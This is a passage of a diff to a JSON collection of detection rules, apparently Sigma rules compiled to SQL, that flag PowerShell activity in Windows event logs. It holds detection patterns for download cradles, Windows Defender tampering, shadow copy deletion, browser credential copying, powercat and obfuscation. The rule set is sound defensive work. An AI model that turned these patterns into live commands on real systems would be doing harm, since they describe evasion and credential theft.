('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "posh_ps_susp_zip_compress.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", - "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", + "id": "975b2262-9a49-439d-92a6-0709cccdf0b2", "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. 
This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.defense_evasion" + ], "falsepositives": [ - "Legitimate administrative script" + "Installation of unsigned packages for testing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AppPackage %' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-AppxPackage %' ESCAPE '\\') AND ScriptBlockText LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "posh_ps_frombase64string_archive.yml" + "filename": "posh_ps_install_unsigned_appx_packages.yml" }, { - "title": "Suspicious Get-ADReplAccount", - "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", + "id": "1139d2e2-84b1-4226-b445-354492eba8ba", + "status": "experimental", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", + "author": "James Pemberton / @4A616D6573", + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + ], + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + }, + { + "title": "Powershell Timestomp", + "id": "c6438007-e081-42ce-9483-b067fbef33c3", "status": "test", - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adreplaccount.yml" + "filename": "posh_ps_timestomp.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", - "id": "db885529-903f-4c5d-9864-28fe199e6370", + "title": "Windows Screen Capture with CopyFromScreen", + "id": "d4a11f63-2390-411c-9adf-d791fd152830", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND 
ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml" + "filename": "posh_ps_capture_screenshots.yml" }, { - "title": "Powershell Exfiltration Over SMTP", - "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE 
'%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_send_mailmessage.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Suspicious PowerShell Download - Powershell Script", - "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", - "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "status": "test", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE 
'%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_download.yml" + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", - "id": "975b2262-9a49-439d-92a6-0709cccdf0b2", - "status": "experimental", - "description": "Detects usage of the 
\"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.defense_evasion" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "Installation of unsigned packages for testing purposes" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AppPackage %' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-AppxPackage %' ESCAPE '\\') AND ScriptBlockText LIKE '% -AllowUnsigned%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_install_unsigned_appx_packages.yml" + "filename": "posh_pc_susp_zip_compress.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "title": "PowerShell Downgrade Attack - PowerShell", + "id": "6331d09b-4785-4c13-980f-f96661356249", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", 
+ "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "posh_pc_downgrade_attack.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -7233,4739 +7161,4682 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + "filename": "posh_pc_xor_commandline.yml" }, { - "title": "Suspicious Unblock-File", - "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "status": "test", - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", - "author": "frack113", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1553.005" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE 
'3.%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_unblock_file.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "Suspicious Non PowerShell WSMAN COM Provider", + "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "status": "test", + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "posh_pc_wsman_com_provider_no_powershell.yml" }, { - "title": "Suspicious 
Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "posh_pc_delete_volume_shadow_copies.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", - "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "title": "Netcat The Powershell Version", + "id": "c5b20776-639a-49bf-94c7-84f912b91c15", + "status": "test", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "posh_pc_powercat.yml" }, { - "title": "Access to Browser Login Data", - "id": "fc028194-969d-4122-8abe-0470d5b8f12f", - "status": "test", - "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", - "author": "frack113", + "title": "Nslookup PowerShell Download Cradle", + "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "status": "experimental", + "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", + "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" ], - "filename": "posh_ps_access_to_browser_login_data.yml" + "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" }, { - "title": "Potential Keylogger Activity", - "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "title": "Suspicious PowerShell Download", + "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "status": "experimental", - "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.credential_access", - "attack.t1056.001" + 
